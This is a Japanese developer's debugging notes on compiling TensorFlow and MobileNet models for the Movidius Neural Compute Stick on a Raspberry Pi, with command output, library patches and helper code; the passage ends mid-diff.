tokunn@tokunn-VirtualBox 17:25:33 [~/Documents/MovidiusTensorflow/use_modelzoo/mobilenet_v1] $ mvNCCompile -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

1

無事に通った？
なんか出力が少なすぎる。

Check !

tokunn@nanase 8:32:09 [~] $ mvNCCheck -s 12 mobilenet_v1_0.5_160_frozen.pb -in=input -on=MobilenetV1/Predictions/Reshape_1 2>/dev/null
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290
USB: Transferring Data...
USB: Myriad Execution Finished
USB: Myriad Connection Closing.
USB: Myriad Connection Closed.
Result:  (1, 1, 1001)
1) 447 0.03534
2) 534 0.02742
3) 825 0.02272
4) 701 0.02151
5) 736 0.02039
Expected:  (1, 1001)
1) 447 0.035791013
2) 534 0.027337724
3) 825 0.02282799
4) 701 0.021315519
5) 736 0.020063626
------------------------------------------------------------
 Obtained values 
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 2.3404913023114204% (max allowed=2%), Fail
 Obtained Average Pixel Accuracy: 0.06249707657843828% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0999000999000999% (max allowed=0%), Fail
 Obtained Pixel-wise L2 error: 0.14634640928212883% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.022390704602003098
------------------------------------------------------------

なんか2%以上ずれてるけど、まぁ正しく動いてるっぽい。

動かしてみる

実際に画像を入力して動かしてみる。

tokunn@nanase 10:41:39 [~/mobilenet] $ python3 pr_mvd_mblnet.py flower 
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
Image path : flower/*.jpg
imgshape  (508, 75, 75)
Start prediting ...
534 534 534 534 534 534 534 534 534 534 534 534 540 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 825 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 540 534 742 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 751 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 534 534 534 534 540 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 534 540 534 534 534 540 534 534 534 534 534 534 534 534 534 540 534 534 534 534 534 869 534 534 534 534 534 540 534 534 534 534 534 534 534 534 534 534 534 
Time : 7.718486547470093 (508 images)

無事に動いた。

結論

Model ZooにあるデータならMovodiusで使える。

ソースコード

.pbからノードを列挙するコード

#!/usr/bin/env python3

import tensorflow as tf
from tensorflow.python.platform import gfile
filename = '../mobilenet_v1_0.5_160_frozen.pb'

node_ops = []
with tf.gfile.GFile(filename, "rb") as f:
    graph_def = tf.GraphDef()
    graph_def.ParseFromString(f.read())

for node in graph_def.node:
    print(str(node.name) + " , " + str(node.op))

Keras から .pbを出すコード

https://stackoverflow.com/questions/45466020/how-to-export-keras-h5-to-tensorflow-pb

def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):
    """
    Freezes the state of a session into a pruned computation graph.

    Creates a new computation graph where variable nodes are replaced by
    constants taking their current value in the session. The new graph will be
    pruned so subgraphs that are not necessary to compute the requested
    outputs are removed.
    @param session The TensorFlow session to be frozen.
    @param keep_var_names A list of variable names that should not be frozen,
                          or None to freeze all the variables in the graph.
    @param output_names Names of the relevant graph outputs.
    @param clear_devices Remove the device directives from the graph for better portability.
    @return The frozen graph definition.
    """
    from tensorflow.python.framework.graph_util import convert_variables_to_constants
    graph = session.graph
    with graph.as_default():
        freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))
        output_names = output_names or []
        output_names += [v.op.name for v in tf.global_variables()]
        input_graph_def = graph.as_graph_def()
        if clear_devices:
            for node in input_graph_def.node:
                node.device = ""
        frozen_graph = convert_variables_to_constants(session, input_graph_def,
                                                      output_names, freeze_var_names)
        return frozen_graph

from keras import backend as K

# Create, compile and train model...

frozen_graph = freeze_session(K.get_session(),
                              output_names=[out.op.name for out in model.outputs])

tf.train.write_graph(frozen_graph, "some_directory", "my_model.pb", as_text=False)

2018-09-22

TensorFlowのモデルをIntelのMovidius Neural Compute Stickを使ってRaspberryPiで動作させるメモ

概要

Raspberry PiでTensorFlow使って画像認識してしたい！
でもRaspberry PiのCPUでTensorFlow動かしても死ぬほど遅い
そこでIntelのMovidiusをRPIにぶっさすことで，超高速に推論ができるというものです．

これを動かすのにとても苦労したので，メモとして残しておきます．

ちなみに，推論しかできません．学習は別のコンピュータでやりましょう．

手順としては，

ハイスペックなコンピュータでTensorFlowを使って学習
TensorFlowの学習済みモデルを保存して，Movidiusで動くグラフにコンパイル
グラフをRPIに持ってきて，Movidiusで推論

という方法になります． f:id:tokunn:20180922135256p:plain

この記事について

以下，やってる途中に書いたメモのコピペです．
説明するために書いてるわけじゃないのでかなり読みずらいと思います．
質問がありましたらTwitterまで
とーくん (@KTokunn) | Twitter

長ったらしいメモなので真面目に読むことはお勧めしません
ctrl+fでエラーメッセージのキーワードで検索してお読みください．

やったこと
- TensorFlow Low LayerのMnist (deep mnist)のサンプルをMovidiusで実行
- mvNCCompile，mvNCProfile，mvNCCheckが動くようにライブラリを書き換え　（なぜか私の環境ではこれらのコンパイラが正しく動作しなかった）
- mvNCCheckに画像を読み込ませるやつはむっちゃごり押し

あとは，やたら出力とかをdetailsタグでまとめたので

まとめられてる部分

って感じで小さくまとめてありますので，左の三角形を押して開いて見てください．

Movidius NCSDK について

NCSDKとは

Movidius NCSDKはMovidius用にモデルを変換・チェックするためのコンパイラと、モデルを利用して推測を行うためのAPIを含むSDKのこと。

 mvNCCompile, mvNCCheck, mvNCProfile

Movidius NCSDKのバージョン

NCSDK1
NCSDK2

NCSDK2に含まれるNCAPI v2ではAPIの関数が異なるため互換はない。

今回は情報が多いのでNCSDK1を使っていくことにします．
なんか，SDK1だと16bit floatしか使えないのに対してSDK2だと32bit float使えるらしい（？）

Movidius NCSDKをTensorFlowから使う方法

TensorFlowでプログラムを書く。
モデルを保存する。
TensorFlowからモデルを開いて編集をして、もう一度保存する。
保存したモデルをMovidius用のgraphにコンパイルする。
graphをMovidiusに転送して実行する。

NCSCKのインストール

詳しくは https://movidius.github.io/ncsdk/install.html

Raspberry Pi 3で行う場合にはそれぞれ4時間程度かかる。

NCSDK1

wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-02_05_00_02-full/ncsdk-2.05.00.02.tar.gz

NCSDK2

wget https://ncs-forum-uploads.s3.amazonaws.com/ncsdk/ncsdk-01_12_00_01-full/ncsdk-1.12.00.01.tar.gz

共通

tar xvf ncsdk-*
cd ncsdk-*
make install
make examples

Exampleの実行 (v1, v2)

ncsdk-*/examples/tensorflow/inception_v3にInception-V3のExampleがある。

ファイル構成

Makefile
inception-v3.py
run.py
categories.txt
inputsize.txt

動作

makeでinception-v3.pyとmvNCCompileが呼び出される。 inception-v3.pyは学習済みのInception-V3モデルのダウンロード、ckpt.metaファイルの保存を行う。モデルはtensorflow.contrib.slim.netsからダウンロードされる。 mvNCCompileはckpt.metaからgraphファイルを作り出す。
make runでrun.pyが呼び出される。 run.pyではgraphファイルをMovius上にロードして一枚の画像の推論を行い、結果を出力する。

動作結果

Number of categories: 1001
Start download to NCS...
*******************************************************************************
inception-v3 on NCS
*******************************************************************************
547 electric guitar 0.9883
403 acoustic guitar 0.00772
715 pick, plectrum, plectron 0.001509
421 banjo 0.000926
820 stage 0.0006595
*******************************************************************************
Finished

V1のAPIでもV2のAPIでも正しく動作し、electric guitarの出力が得られた。

. Movidiusなし
[10.55, 2.15, 2.16, 2.10, 3.90, 2.12, n/a, n/a, n/a, n/a] （10回実施、単位は秒）
RAM使用率 90%程度
CPU使用率 90%程度
predictを実行するとdmesgにUnder-voltage detected!と表示されることがある。表示された場合にはpredictにかかる時間が長くなる。
複数回続けて実行すると電力不足のためかシステムが落ちる。（今回の結果では7回目以降）


2. Movidiusあり
[0.62, 0.59, 0.60, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61, 0.61] （10回実施、単位は秒）
RAM使用率 10%程度
CPU使用率  5%程度

任意のTensorFlowモデルのコンパイル (自作モデルのコンパイル)

学習

自作のTensorFlowモデルをMovidius用にコンパイルするためには、ソースコードの編集を行いMovidius用にする必要がある。
1. 入力のPlaceholderに名前を付ける 2. tf.train.Saver()を使って学習済みネットワークを保存する

これによって、

****.index
****.data-00000-of-00001
****.meta

の３つのファイルが生成される。

コンパイル可能なファイルに変換

次に、生成された学習済みモデルをもう一度開いてMovidiusでコンパイルが可能なモデルを出力する。修正点は次の通り 1. 出力の活性化関数に名前を付ける 2. 入力以外のPlaceholderをすべて削除する 3. dropoutを削除する 4. 学習用データの読み込みを削除する 5. loss, training, accuracyなど学習用のコードを削除する

こられの変更をしたコードで、保存したモデルをrestoreで開き、またsaveする。
これによって、

****_inference.index
****_inference.data-00000-of-00001
****_inference.meta

の３つのファイルが生成される。

コンパイル

mvNCCompileコマンドを使って保存した****.metaファイルをgraphファイルに変換する。

mvNCCompile ****_inference.meta -s 12 -in input -on output -o ****_inference.graph

この時、inputとoutputにはそれぞれ指定したinput nodeとoutput nodeの名前を入れる。

実行結果

TensorflowのExampleにあるdeep_mnist.pyを試した。

tokunn@tokunn-VirtualBox 11:31:44 [~/Documents/MovidiusTensorflow/mnist] $ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

/usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  if d.decorator_argspec is not None), _inspect.getargspec(target))
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCompile", line 118, in <module>
    create_graph(args.network, args.inputnode, args.outputnode, args.outfile, args.nshaves, args.inputsize, args.weights)
  File "/usr/local/bin/mvNCCompile", line 104, in create_graph
    net = parse_tensor(args, myriad_config)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 293, in parse_tensor
    if have_first_input(strip_tensor_id(node.outputs[0].name)):
IndexError: list index out of range

ファイル変換までは問題なく動くが、コンパイル時にmvNCCompile内でIndexErrorを起こして止まってしまう。配列の要素を確認せずにアクセスしていることが原因。

ライブラリの書き換え

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.pyを編集して、回避する。やってよいのかどうかは不明。

<                 if have_first_input(strip_tensor_id(node.outputs[0].name)):
---
>                 # ******* EDIT ******
>                 print(len(node.outputs))
>                 if len(node.outputs) and have_first_input(strip_tensor_id(node.outputs[0].name)):

これによってmvNCCompileは通って、graphファイルも生成されるようになった。

tokunn@tokunn-VirtualBox 11:36:34 [~/Documents/MovidiusTensorflow/mnist] $ mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph     
mvNCCompile v02.00, Copyright @ Movidius Ltd 2016

/usr/local/lib/python3.5/dist-packages/tensorflow/python/framework/ops.py:766: DeprecationWarning: builtin type EagerTensor has no __module__ attribute
  EagerTensor = c_api.TFE_Py_InitEagerTensor(_EagerTensorBase)
/usr/local/lib/python3.5/dist-packages/tensorflow/python/util/tf_inspect.py:45: DeprecationWarning: inspect.getargspec() is deprecated, use inspect.signature() instead
  if d.decorator_argspec is not None), _inspect.getargspec(target))
1
1
1
1
0
1
/usr/local/bin/ncsdk/Controllers/FileIO.py:52: UserWarning: You are using a large type. Consider reducing your data sizes for best performance
  "Consider reducing your data sizes for best performance\033[0m")

Movidiusで動作確認 (v1)

実際にどうさせてみる。以下、特筆なしの場合、APIはv1を使用。

pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py
Start prediting ...
2 2 8 2 2 2 2 2 2 2 2 2 8 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 2 2 0 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 0 2 2 2 2 2 2 8 8 0 2 0 2 2 2 2 2 8 2 0 2 2 2 2 2 2 2 2 0 0 2 2 8 2 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 2 0 2 2 8 2 2 2 2 2 0 2 2 2 2 8 2 2 2 2 2 2 2 2 2 2 2 0 2 2 2 2 8 2 2 2 0 2 2 2 8 8 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2 8 2 0 2 2 2 0 2 2 8 2 2 2 0 2 0 8 2 2 2 2 2 2 2 8 2 2 2 8 2 8 2 2 2 2 2 2 8 2 2 2 8 2 2 8 8 2 2 2 0 2 2 2 0 0 2 2 2 2 2 8 2 0 2 2 8 2 2 8 2 2 2 2 2 0 2 2 8 2 2 2 2 2 2 0 8 0 2 2 0 2 0 8 0 2 2 2 2 2 2 0 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 2 0 2 0 2 2 2 8 2 2 2 2 2 2 2 0 2 2 0 2 2 8 2 2 8 2 2 0 2 0 2 0 2 2 2 0 2 0 2 2 8 2 2 2 0 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 8 2 2 2 2 0 2 2 2 8 2 2 0 2 2 2 2 2 0 2 2 2 2 2 2 0 8 2 2 2 8 2 0 2 2 2 2 2 2 2 0 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 0 0 2 2 2 2 2 0 8 2 2 2 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 8 2 2 0 2 2 2 2 2 2 2 0 2 2 2 2 0 2 2 2 2 8 2 8 2 2 2 2 2 2 2 2 8 2 2 2 2 8 2 2 2 2 2 2 2
Time : 4.403196096420288 (500 images)

正しくない結果が出力された。
1～9までの9枚で確認する。

pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py
pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py
../../JPEGImages/pickup/00628.jpg
../../JPEGImages/pickup/00042.jpg
../../JPEGImages/pickup/00025.jpg
../../JPEGImages/pickup/00652.jpg
../../JPEGImages/pickup/00013.jpg
../../JPEGImages/pickup/00520.jpg
../../JPEGImages/pickup/00663.jpg
../../JPEGImages/pickup/00683.jpg
../../JPEGImages/pickup/00433.jpg
Start prediting ...
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]

Time : 0.11402153968811035 (9 images)

なぜか4と7が100%"8"だと認識されて、それ以外は100%"2"だと認識される。逆順に入れてみる。

pi@raspberrypi:~/week2/workspace $ vim prediction_byMovidius4mvncV1.py
pi@raspberrypi:~/week2/workspace $ python3 prediction_byMovidius4mvncV1.py
../../JPEGImages/pickup/00433.jpg
../../JPEGImages/pickup/00683.jpg
../../JPEGImages/pickup/00663.jpg
../../JPEGImages/pickup/00520.jpg
../../JPEGImages/pickup/00013.jpg
../../JPEGImages/pickup/00652.jpg
../../JPEGImages/pickup/00025.jpg
../../JPEGImages/pickup/00042.jpg
../../JPEGImages/pickup/00628.jpg
Start prediting ...
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0. 0. 0.]

Time : 0.11403870582580566 (9 images)

やはり4と7が100%"8"だと認識されて、それ以外は100%"2"。

もう一度最初から

学習

deepmnist.pyをjupyter-notebookで実行。

saving graph to: /tmp/tmpc_vjn3sg
step 0, training accuracy 0.08
step 10, training accuracy 0.4
step 20, training accuracy 0.46
(略)
step 470, training accuracy 0.96
step 480, training accuracy 0.92
step 490, training accuracy 0.96
test accuracy 0.939

Test Accuracyは0.939で正しく学習できている。
出力ファイルが正しく保存されていることを確認。

tokunn@tokunn-VirtualBox 13:49:04 [~/Documents/MovidiusTensorflow/mnist0911] $ ls -1
MNIST_data/
checkpoint
conv4movidius.ipynb
deepmnist.ipynb
mnist_model.data-00000-of-00001
mnist_model.index
mnist_model.meta
output/

さらに、Movidius用に保存しなおし。

tokunn@tokunn-VirtualBox 13:51:43 [~/Documents/MovidiusTensorflow/mnist0911] $ ls -1
MNIST_data/
checkpoint
conv4movidius.ipynb
deepmnist.ipynb
mnist_inference.data-00000-of-00001
mnist_inference.index
mnist_inference.meta
mnist_model.data-00000-of-00001
mnist_model.index
mnist_model.meta
output/

コンパイルを実行。

mvNCCompile mnist_inference.meta -s 12 -in input -on output -o mnist_inference.graph

RPIでMovidiusでpredictしてみる。

pi@raspberrypi:~/week2/mnist0911 $ python3 prediction_byMovidius4mvncV1.py 
../../JPEGImages/pickup/00433.jpg
../../JPEGImages/pickup/00683.jpg
../../JPEGImages/pickup/00663.jpg
../../JPEGImages/pickup/00520.jpg
../../JPEGImages/pickup/00013.jpg
../../JPEGImages/pickup/00652.jpg
../../JPEGImages/pickup/00025.jpg
../../JPEGImages/pickup/00042.jpg
../../JPEGImages/pickup/00628.jpg
Start prediting ...
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]
[0. 0. 0. 0. 0. 0. 0. 0. 1. 0.]

Time : 0.1024773120880127 (10 images)

やはり変わらず。

RPI3じゃなくて実マシンでやってみる

Rspberry Piが悪いかもしれないから、実際のLinuxマシン(Ubuntu 16.04 - nanase)でやってみる。

tokunn@nanase 7:11:40 [~/Documents/week2/0911] $ python3 prediction_byMovidius4mvncV1.py
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_vector.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
ERROR 1: libgrass_dgl.7.4.0.so: cannot open shared object file: No such file or directory
Image path : ./JPEGImages/*.jpg
Start prediting ...
[ 0.  0.  0.  0.  0.  1.  0.  0.  0.  0.]
[ 1.  0.  0.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]
[  3.35454941e-04   0.00000000e+00   0.00000000e+00   0.00000000e+00
   1.00000000e+00   0.00000000e+00   0.00000000e+00   0.00000000e+00
   0.00000000e+00   0.00000000e+00]
[ 0.  0.  0.  0.  0.  1.  0.  0.  0.  0.]
[ 0.  0.  1.  0.  0.  0.  0.  0.  0.  0.]

Time : 0.0796973705291748 (10 images)

やっぱり何かおかしい。
Rspberry Piだから起きている訳ではない。 おそらく問題はmvNCCompileで生成されたgraphファイルなのでは？

Tensorflowで保存したファイルが正しいかを確認する。

jupyter-notebook上で、mnist_modelからrestoreしてpredictさせてみる。

INFO:tensorflow:Restoring parameters from ./output/mnist_model
test accuracy 0.9477

問題なくpredictできている。

mvNCCompileに入れているファイルが正しいかどうかを確認する

これが正しく動いていれば、問題はmvNCCompile。もしくは突っ込んだファイルがダメか。
jupyter-notebook上で、mnist_inferenceからrestoreしてpredictさせてみる。

INFO:tensorflow:Restoring parameters from ./output/mnist_inference
test accuracy 0.9477

こちらも問題なくpredictできている。 ---> 問題はmvNCCompile周辺

mvNCCheckでモデルの確認をしてみる

mvNCCheckを使って、モデルの確認を行う。

tokunn@nanase 8:20:05 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

USB: Transferring Data...
USB: Myriad Execution Finished
USB: Myriad Connection Closing.
USB: Myriad Connection Closed.
Result:  (1, 1, 10)
1) 8 0.69141
2) 2 0.10852
3) 4 0.075806
4) 3 0.047607
5) 5 0.028824
Expected:  (1, 10)
1) 8 0.685481
2) 2 0.111384
3) 4 0.078136
4) 3 0.0483064
5) 5 0.0283811
------------------------------------------------------------
 Obtained values 
------------------------------------------------------------
 Obtained Min Pixel Accuracy: 0.8644439280033112% (max allowed=2%), Pass
 Obtained Average Pixel Accuracy: 0.19093991722911596% (max allowed=1%), Pass
 Obtained Percentage of wrong values: 0.0% (max allowed=0%), Pass
 Obtained Pixel-wise L2 error: 0.325355674229958% (max allowed=1%), Pass
 Obtained Global Sum Difference: 0.013088561594486237
------------------------------------------------------------

Result(Movidiusの出力)とExpected(TensorFlowの出力)がほぼ同じであることから、正しく動作していると考えられる。
ということは、問題なのは推論に使っているNCAPIのほう？

mvNCCheckを使って認識してみる

mvNCCheckに-iオプションを付けることで自分で画像ファイルを指定して入力することができる。

tokunn@nanase 8:58:09 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 266, in parse_tensor
    int(shape[3]),
IndexError: list index out of range

ライブラリ内の/usr/local/bin/ncsdk/Controllers/TensorFlowParser.pyでまたIndexError: list index out of rangeが発生。
~~いい加減TensorFlowParserはリストにアクセスする前に要素数をチェックしていただきたい。~~
とりあえず204行目のdebug=Trueを有効化して、shapeを表示つするように追記。

204c204
<     # debug = True
---
>     debug = True
263a264
>             print("Input image shape", shape)

これを実行して、

tokunn@nanase 9:25:28 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph -i ../JPEGImages/pickup/00013.jpg
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Input image shape [1, 784]
Traceback (most recent call last):
  File "/usr/local/bin/mvNCCheck", line 152, in <module>
    quit_code = check_net(args.network, args.image, args.inputnode, args.outputnode, args.nshaves, args.inputsize, args.weights, args)
  File "/usr/local/bin/mvNCCheck", line 130, in check_net
    net = parse_tensor(args, myriad_config, file_gen=True)
  File "/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py", line 267, in parse_tensor
    int(shape[3]),
IndexError: list index out of range

の結果を得る。
Input shapeは[1, 784]であることがわかる。
-i [画像]のオプションなしで実行すると、

tokunn@nanase 9:26:30 [~/Documents/week2/0911/output] $ mvNCCheck mnist_inference.meta -s 12 -in input -on output -of mnist_inference.graph                                 
mvNCCheck v02.00, Copyright @ Movidius Ltd 2016

Input image shape [1, 784]
        0 Const Const
           OUT: Const:0
/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py line no.290
        1 VariableV2 Variable
           OUT: Variable:0
(略)
BiasAdd
        75 Softmax output
           IN: fc2/add:0
           OUT: output:0
Softmax
(略)
Result:  (1, 1, 10)
1) 8 0.32178
2) 4 0.22034
3) 2 0.14233
4) 0 0.10773
5) 3 0.1059
(略)

のように正しく実行される。
Input shapeは[1, 784]で、エラーが起きたときと同じである。
~~あれ、なんでこれCNNなのに1次元([1,784]の2次元)で入力してるんだこれ？~~ ~~[1,28,28]じゃないのかな~~
-> ちゃんと入力してからreshapeして28x28にしてた。
こちらとしては2次元([1, 784])で入力したいが、TensorFlowParserは最低でも4次元はないとお気に召さないらしい。
でも、内部で乱数生成しているときには何にも起きないのなんで？
とりあえず、問題のparse_img()の定義を探してみる。

tokunn@nanase 9:55:12 [/opt/movidius/NCSDK/ncsdk-x86_64/tk/Models] $ find / -type f 2>/dev/null | grep .py | xargs grep parse_img 2>/dev/null
/usr/local/bin/ncsdk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
/opt/movidius/NCSDK/ncsdk-armv7l/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
/opt/movidius/NCSDK/ncsdk-x86_64/tk/Controllers/MiscIO.py:def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):

/usr/local/bin/ncsdk/Controllers/MiscIO.pyにあるらしい。

# 定義
227 def parse_img(path, new_size, raw_scale=1, mean=None, channel_swap=None):
228     """
229     Parse an image with the Python Imaging Libary and convert to 4D numpy array
234     """

確かにあった。
ちなみに呼び出しは、

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

# 呼び出し
266:  input_data = parse_img(image,
267-                         [int(shape[0]),
268-                          int(shape[3]),
269-                          int(shape[1]),
270-                          int(shape[2])],
271-                         raw_scale=arguments.raw_scale,
272-                         mean=arguments.mean,
273-                         channel_swap=arguments.channel_swap)

となっている。
呼び出しの変数をどうしたらいいのか知りたいので、parse_img()を追いかける。 /usr/local/bin/ncsdk/Controllers/MiscIO.py

248     if path.split(".")[-1].lower() in ["png", "jpeg", "jpg", "bmp", "gif"]:
250         greyscale = True if new_size[2] == 1 else False

どうやらnew_size[2](配列の3番目)はカラーチャンネルを確かめているらしい。
というわけでint(shape[1])は今回は１となる。
第一引数のpath(呼び出し側ではimage)は画像ファイルへのパスを表している。

279     if (len(data.shape) == 2):
280         # Add axis for greyscale images (size 1)
281         data = data[:, :, np.newaxis]
282 
283     data = skimage.transform.resize(data, new_size[2:])
284     data = np.transpose(data, (2, 0, 1))
285     data = np.reshape(data, (1, data.shape[0], data.shape[1], data.shape[2]))
286 
287     data *= raw_scale

まず、grayscaleの場合にはshapeが(x, y)のみなので、1次元追加することで3次元としている。
これでshapeは(x, y, カラーチャンネル数)となる。

次にresizeの指定にnew_size[2]とnew_size[3]を使っている。
呼び出し側で、int(shape[1])とint(shape[2])となるわけだが、int(shape[1])はグレースケールか否かを表しているのでは？
newsizeが使われているのはこの２か所のみ。
~~どういうこったい~~

次に、(x, y, カラーチャンネル数)を(カラーチャンネル数, x, y)になるように軸を入れ替えする。

ちなみに、正しく動作しているランダム値の時のinput_data(TensorFlowParser内)は、

259  input_data = np.random.uniform(0, 1, shape)

となっているから、最終的にはinput_dataのshapeは(1,784)のもとの形となるべき。

これらの情報から引数の予想を立てる。
まず、new_image以外に入るべき値はそのままでよい。
次に、new_imageに入れるべきshapeについてであるが、通常は画像は(枚数, x, y, カラーチャンネル数)のようになっているであろうと想像がつく。
これを呼び出し側では[枚数, カラーチャンネル数, x, y]の形にして入力している。
よって、入力は[1, 1, shape[0], shape[1]]となる。

/usr/local/bin/ncsdk/Controllers/TensorFlowParser.py

268,271c268,271
<                                    [int(shape[0]),
